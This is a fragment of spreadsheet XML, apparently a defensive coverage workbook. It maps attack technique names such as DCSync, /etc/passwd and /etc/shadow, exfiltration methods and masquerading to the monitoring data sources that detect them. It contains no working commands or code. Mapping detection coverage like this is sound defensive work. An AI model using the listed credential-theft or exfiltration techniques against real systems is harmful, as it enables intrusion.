        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F12" s="13"/>
      <c r="G12" s="53" t="str">
        <f>VLOOKUP(A12,'REF-DataSources'!A:B,2)</f>
        <v>DCSync</v>
      </c>
    </row>
    <row r="13" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A13" s="55" t="s">
        <v>587</v>
      </c>
      <c r="B13" s="17" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C13" s="17">
        <v>100</v>
      </c>
      <c r="D13" s="17">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E13" s="17">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F13" s="13"/>
      <c r="G13" s="53" t="str">
        <f>VLOOKUP(A13,'REF-DataSources'!A:B,2)</f>
        <v>Proc Filesystem</v>
      </c>
    </row>
    <row r="14" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A14" s="55" t="s">
        <v>593</v>
      </c>
      <c r="B14" s="17" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C14" s="17">
        <v>100</v>
      </c>
      <c r="D14" s="17">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E14" s="17">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F14" s="13"/>
      <c r="G14" s="53" t="str">
        <f>VLOOKUP(A14,'REF-DataSources'!A:B,2)</f>
        <v>/etc/passwd and /etc/shadow</v>
      </c>
    </row>
    <row r="15" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A15" s="55" t="s">
        <v>51</v>
      </c>
      <c r="B15" s="17" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C15" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D15" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E15" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F15" s="13"/>
      <c r="G15" s="53" t="str">
        <f>VLOOKUP(A15,'REF-DataSources'!A:B,2)</f>
        <v>Data from Local System</v>
      </c>
    </row>
    <row r="16" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A16" s="55" t="s">
        <v>53</v>
      </c>
      <c r="B16" s="17" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C16" s="17">
        <v>100</v>
      </c>
      <c r="D16" s="17">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E16" s="17">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F16" s="13"/>
      <c r="G16" s="53" t="str">
        <f>VLOOKUP(A16,'REF-DataSources'!A:B,2)</f>
        <v>Direct Volume Access</v>
      </c>
    </row>
    <row r="17" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A17" s="55" t="s">
        <v>54</v>
      </c>
      <c r="B17" s="17" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C17" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D17" s="17">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E17" s="17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F17" s="13"/>
      <c r="G17" s="53" t="str">
        <f>VLOOKUP(A17,'REF-DataSources'!A:B,2)</f>
        <v>System Service Discovery</v>
      </c>
    </row>
    <row r="18" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A18" s="55" t="s">
        <v>56</v>
      </c>
      <c r="B18" s="17" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</v>
      </c>
      <c r="C18" s="17" t="s">
        <v>57</v>
      </c>
      <c r="D18" s="17">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E18" s="17">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F18" s="13"/>
      <c r="G18" s="53" t="str">
        <f>VLOOKUP(A18,'REF-DataSources'!A:B,2)</f>
        <v>Fallback Channels</v>
      </c>
    </row>
    <row r="19" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A19" s="55" t="s">
        <v>60</v>
      </c>
      <c r="B19" s="17" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C19" s="17" t="s">
        <v>61</v>
      </c>
      <c r="D19" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E19" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F19" s="13"/>
      <c r="G19" s="53" t="str">
        <f>VLOOKUP(A19,'REF-DataSources'!A:B,2)</f>
        <v>Application Window Discovery</v>
      </c>
    </row>
    <row r="20" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A20" s="55" t="s">
        <v>62</v>
      </c>
      <c r="B20" s="17" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring</v>
      </c>
      <c r="C20" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D20" s="17">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E20" s="17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F20" s="13"/>
      <c r="G20" s="53" t="str">
        <f>VLOOKUP(A20,'REF-DataSources'!A:B,2)</f>
        <v>Exfiltration Over Other Network Medium</v>
      </c>
    </row>
    <row r="21" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A21" s="55" t="s">
        <v>626</v>
      </c>
      <c r="B21" s="17" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,User interface</v>
      </c>
      <c r="C21" s="17" t="s">
        <v>3099</v>
      </c>
      <c r="D21" s="17">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E21" s="17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F21" s="13"/>
      <c r="G21" s="53" t="str">
        <f>VLOOKUP(A21,'REF-DataSources'!A:B,2)</f>
        <v>Exfiltration Over Bluetooth</v>
      </c>
    </row>
    <row r="22" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A22" s="55" t="s">
        <v>64</v>
      </c>
      <c r="B22" s="17" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C22" s="17" t="s">
        <v>65</v>
      </c>
      <c r="D22" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E22" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F22" s="13"/>
      <c r="G22" s="53" t="str">
        <f>VLOOKUP(A22,'REF-DataSources'!A:B,2)</f>
        <v>Query Registry</v>
      </c>
    </row>
    <row r="23" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A23" s="55" t="s">
        <v>68</v>
      </c>
      <c r="B23" s="17" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:C)</f>
        <v>BIOS,MBR,System calls</v>
      </c>
      <c r="C23" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D23" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E23" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F23" s="13"/>
      <c r="G23" s="53" t="str">
        <f>VLOOKUP(A23,'REF-DataSources'!A:B,2)</f>
        <v>Rootkit</v>
      </c>
    </row>
    <row r="24" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A24" s="55" t="s">
        <v>72</v>
      </c>
      <c r="B24" s="17" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C24" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D24" s="17">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E24" s="17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F24" s="13"/>
      <c r="G24" s="53" t="str">
        <f>VLOOKUP(A24,'REF-DataSources'!A:B,2)</f>
        <v>System Network Configuration Discovery</v>
      </c>
    </row>
    <row r="25" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A25" s="55" t="s">
        <v>75</v>
      </c>
      <c r="B25" s="17" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</v>
      </c>
      <c r="C25" s="17" t="s">
        <v>76</v>
      </c>
      <c r="D25" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E25" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F25" s="13"/>
      <c r="G25" s="53" t="str">
        <f>VLOOKUP(A25,'REF-DataSources'!A:B,2)</f>
        <v>Remote System Discovery</v>
      </c>
    </row>
    <row r="26" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A26" s="55" t="s">
        <v>79</v>
      </c>
      <c r="B26" s="17" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process use of network</v>
      </c>
      <c r="C26" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D26" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E26" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F26" s="13"/>
      <c r="G26" s="53" t="str">
        <f>VLOOKUP(A26,'REF-DataSources'!A:B,2)</f>
        <v>Automated Exfiltration</v>
      </c>
    </row>
    <row r="27" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A27" s="55" t="s">
        <v>651</v>
      </c>
      <c r="B27" s="17" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Packet capture,Network protocol analysis</v>
      </c>
      <c r="C27" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D27" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E27" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F27" s="13"/>
      <c r="G27" s="53" t="str">
        <f>VLOOKUP(A27,'REF-DataSources'!A:B,2)</f>
        <v>Traffic Duplication</v>
      </c>
    </row>
    <row r="28" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A28" s="55" t="s">
        <v>80</v>
      </c>
      <c r="B28" s="17" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Windows event logs,Process use of network,Process monitoring,Process command-line parameters,PowerShell logs,Packet capture,Network protocol analysis,Netflow/Enclave netflow,File monitoring,DLL monitoring,Authentication logs,API monitoring</v>
      </c>
      <c r="C28" s="17" t="s">
        <v>3103</v>
      </c>
      <c r="D28" s="17">
        <f t="shared" si="1"/>
        <v>13</v>
      </c>
      <c r="E28" s="17">
        <f t="shared" si="2"/>
        <v>13</v>
      </c>
      <c r="F28" s="13"/>
      <c r="G28" s="53" t="str">
        <f>VLOOKUP(A28,'REF-DataSources'!A:B,2)</f>
        <v>Remote Services</v>
      </c>
    </row>
    <row r="29" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A29" s="55" t="s">
        <v>662</v>
      </c>
      <c r="B29" s="17" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Netflow/Enclave netflow,Authentication logs</v>
      </c>
      <c r="C29" s="17" t="s">
        <v>137</v>
      </c>
      <c r="D29" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E29" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F29" s="13"/>
      <c r="G29" s="53" t="str">
        <f>VLOOKUP(A29,'REF-DataSources'!A:B,2)</f>
        <v>Remote Desktop Protocol</v>
      </c>
    </row>
    <row r="30" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A30" s="55" t="s">
        <v>667</v>
      </c>
      <c r="B30" s="17" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Authentication logs,Process use of network</v>
      </c>
      <c r="C30" s="17" t="s">
        <v>184</v>
      </c>
      <c r="D30" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E30" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F30" s="13"/>
      <c r="G30" s="53" t="str">
        <f>VLOOKUP(A30,'REF-DataSources'!A:B,2)</f>
        <v>SMB/Windows Admin Shares</v>
      </c>
    </row>
    <row r="31" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A31" s="55" t="s">
        <v>672</v>
      </c>
      <c r="B31" s="17" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Windows Registry,Process monitoring,Packet capture,DLL monitoring,Authentication logs,API monitoring,PowerShell logs</v>
      </c>
      <c r="C31" s="17" t="s">
        <v>3104</v>
      </c>
      <c r="D31" s="17">
        <f t="shared" si="1"/>
        <v>8</v>
      </c>
      <c r="E31" s="17">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="F31" s="13"/>
      <c r="G31" s="53" t="str">
        <f>VLOOKUP(A31,'REF-DataSources'!A:B,2)</f>
        <v>Distributed Component Object Model</v>
      </c>
    </row>
    <row r="32" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A32" s="55" t="s">
        <v>677</v>
      </c>
      <c r="B32" s="17" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Process use of network,Network protocol analysis,Netflow/Enclave netflow</v>
      </c>
      <c r="C32" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D32" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E32" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F32" s="13"/>
      <c r="G32" s="53" t="str">
        <f>VLOOKUP(A32,'REF-DataSources'!A:B,2)</f>
        <v>SSH</v>
      </c>
    </row>
    <row r="33" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A33" s="55" t="s">
        <v>683</v>
      </c>
      <c r="B33" s="17" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Network protocol analysis,Netflow/Enclave netflow</v>
      </c>
      <c r="C33" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D33" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E33" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F33" s="13"/>
      <c r="G33" s="53" t="str">
        <f>VLOOKUP(A33,'REF-DataSources'!A:B,2)</f>
        <v>VNC</v>
      </c>
    </row>
    <row r="34" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A34" s="55" t="s">
        <v>688</v>
      </c>
      <c r="B34" s="17" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</v>
      </c>
      <c r="C34" s="17" t="s">
        <v>3105</v>
      </c>
      <c r="D34" s="17">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E34" s="17">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F34" s="13"/>
      <c r="G34" s="53" t="str">
        <f>VLOOKUP(A34,'REF-DataSources'!A:B,2)</f>
        <v>Windows Remote Management</v>
      </c>
    </row>
    <row r="35" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A35" s="55" t="s">
        <v>85</v>
      </c>
      <c r="B35" s="17" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C35" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D35" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E35" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F35" s="13"/>
      <c r="G35" s="53" t="str">
        <f>VLOOKUP(A35,'REF-DataSources'!A:B,2)</f>
        <v>Data from Removable Media</v>
      </c>
    </row>
    <row r="36" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A36" s="55" t="s">
        <v>86</v>
      </c>
      <c r="B36" s="17" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C36" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D36" s="17">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E36" s="17">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F36" s="13"/>
      <c r="G36" s="53" t="str">
        <f>VLOOKUP(A36,'REF-DataSources'!A:B,2)</f>
        <v>Multiband Communication</v>
      </c>
    </row>
    <row r="37" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A37" s="55" t="s">
        <v>87</v>
      </c>
      <c r="B37" s="17" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process use of network,File monitoring,Malware reverse engineering,Binary file metadata,Process command-line parameters,Environment variable,Process monitoring,Windows event logs,Network intrusion detection system,Email gateway,SSL/TLS inspection</v>
      </c>
      <c r="C37" s="17"/>
      <c r="D37" s="17">
        <f t="shared" si="1"/>
        <v>12</v>
      </c>
      <c r="E37" s="17">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F37" s="13"/>
      <c r="G37" s="53" t="str">
        <f>VLOOKUP(A37,'REF-DataSources'!A:B,2)</f>
        <v>Obfuscated Files or Information</v>
      </c>
    </row>
    <row r="38" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A38" s="55" t="s">
        <v>705</v>
      </c>
      <c r="B38" s="17" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Binary file metadata,File monitoring,Malware reverse engineering</v>
      </c>
      <c r="C38" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D38" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E38" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F38" s="13"/>
      <c r="G38" s="53" t="str">
        <f>VLOOKUP(A38,'REF-DataSources'!A:B,2)</f>
        <v>Binary Padding</v>
      </c>
    </row>
    <row r="39" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A39" s="55" t="s">
        <v>711</v>
      </c>
      <c r="B39" s="17" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata</v>
      </c>
      <c r="C39" s="17">
        <v>100</v>
      </c>
      <c r="D39" s="17">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E39" s="17">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F39" s="13"/>
      <c r="G39" s="53" t="str">
        <f>VLOOKUP(A39,'REF-DataSources'!A:B,2)</f>
        <v>Software Packing</v>
      </c>
    </row>
    <row r="40" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A40" s="55" t="s">
        <v>717</v>
      </c>
      <c r="B40" s="17" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata</v>
      </c>
      <c r="C40" s="17">
        <v>100</v>
      </c>
      <c r="D40" s="17">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E40" s="17">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F40" s="13"/>
      <c r="G40" s="53" t="str">
        <f>VLOOKUP(A40,'REF-DataSources'!A:B,2)</f>
        <v>Steganography</v>
      </c>
    </row>
    <row r="41" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A41" s="55" t="s">
        <v>720</v>
      </c>
      <c r="B41" s="17" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C41" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D41" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E41" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F41" s="13"/>
      <c r="G41" s="53" t="str">
        <f>VLOOKUP(A41,'REF-DataSources'!A:B,2)</f>
        <v>Compile After Delivery</v>
      </c>
    </row>
    <row r="42" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A42" s="55" t="s">
        <v>726</v>
      </c>
      <c r="B42" s="17" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</v>
      </c>
      <c r="C42" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D42" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E42" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F42" s="13"/>
      <c r="G42" s="53" t="str">
        <f>VLOOKUP(A42,'REF-DataSources'!A:B,2)</f>
        <v>Indicator Removal from Tools</v>
      </c>
    </row>
    <row r="43" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A43" s="55" t="s">
        <v>91</v>
      </c>
      <c r="B43" s="17" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C43" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D43" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E43" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F43" s="13"/>
      <c r="G43" s="53" t="str">
        <f>VLOOKUP(A43,'REF-DataSources'!A:B,2)</f>
        <v>Scheduled Transfer</v>
      </c>
    </row>
    <row r="44" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A44" s="55" t="s">
        <v>92</v>
      </c>
      <c r="B44" s="17" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C44" s="17" t="s">
        <v>93</v>
      </c>
      <c r="D44" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E44" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F44" s="13"/>
      <c r="G44" s="53" t="str">
        <f>VLOOKUP(A44,'REF-DataSources'!A:B,2)</f>
        <v>Data Transfer Size Limits</v>
      </c>
    </row>
    <row r="45" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A45" s="55" t="s">
        <v>98</v>
      </c>
      <c r="B45" s="17" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C45" s="17" t="s">
        <v>99</v>
      </c>
      <c r="D45" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E45" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F45" s="13"/>
      <c r="G45" s="53" t="str">
        <f>VLOOKUP(A45,'REF-DataSources'!A:B,2)</f>
        <v>System Owner/User Discovery</v>
      </c>
    </row>
    <row r="46" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A46" s="55" t="s">
        <v>100</v>
      </c>
      <c r="B46" s="17" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C46" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D46" s="17">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E46" s="17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F46" s="13"/>
      <c r="G46" s="53" t="str">
        <f>VLOOKUP(A46,'REF-DataSources'!A:B,2)</f>
        <v>Path Interception</v>
      </c>
    </row>
    <row r="47" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A47" s="55" t="s">
        <v>102</v>
      </c>
      <c r="B47" s="17" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Process monitoring,Binary file metadata</v>
      </c>
      <c r="C47" s="17" t="s">
        <v>95</v>
      </c>
      <c r="D47" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E47" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F47" s="13"/>
      <c r="G47" s="53" t="str">
        <f>VLOOKUP(A47,'REF-DataSources'!A:B,2)</f>
        <v>Masquerading</v>
      </c>
    </row>
    <row r="48" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A48" s="55" t="s">
        <v>752</v>
      </c>
      <c r="B48" s="17" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Binary file metadata</v>
      </c>
      <c r="C48" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D48" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E48" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F48" s="13"/>
      <c r="G48" s="53" t="str">
        <f>VLOOKUP(A48,'REF-DataSources'!A:B,2)</f>
        <v>Invalid Code Signature</v>
      </c>
    </row>
    <row r="49" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A49" s="55" t="s">
        <v>757</v>
      </c>
      <c r="B49" s="17" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C49" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D49" s="17">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E49" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F49" s="13"/>
      <c r="G49" s="53" t="str">
        <f>VLOOKUP(A49,'REF-DataSources'!A:B,2)</f>
        <v>Right-to-Left Override</v>
      </c>
    </row>
    <row r="50" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A50" s="55" t="s">
        <v>761</v>
      </c>
      <c r="B50" s="17" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C50" s="17" t="s">
        <v>47</v>
      </c>
      <c r="D50" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E50" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F50" s="13"/>
      <c r="G50" s="53" t="str">
        <f>VLOOKUP(A50,'REF-DataSources'!A:B,2)</f>
        <v>Rename System Utilities</v>
      </c>
    </row>
    <row r="51" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A51" s="55" t="s">
        <v>766</v>
      </c>
      <c r="B51" s="17" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C51" s="17" t="s">
        <v>303</v>
      </c>
      <c r="D51" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E51" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F51" s="13"/>
      <c r="G51" s="53" t="str">
        <f>VLOOKUP(A51,'REF-DataSources'!A:B,2)</f>
        <v>Masquerade Task or Service</v>
      </c>
    </row>
    <row r="52" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A52" s="55" t="s">
        <v>772</v>
      </c>
      <c r="B52" s="17" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C52" s="17" t="s">
        <v>47</v>
      </c>
      <c r="D52" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E52" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F52" s="13"/>
      <c r="G52" s="53" t="str">
        <f>VLOOKUP(A52,'REF-DataSources'!A:B,2)</f>
        <v>Match Legitimate Name or Location</v>
      </c>
    </row>
    <row r="53" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A53" s="55" t="s">
        <v>776</v>
      </c>
      <c r="B53" s="17" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C53" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D53" s="17">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E53" s="17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F53" s="13"/>
      <c r="G53" s="53" t="str">
        <f>VLOOKUP(A53,'REF-DataSources'!A:B,2)</f>
        <v>Space after Filename</v>
      </c>
    </row>
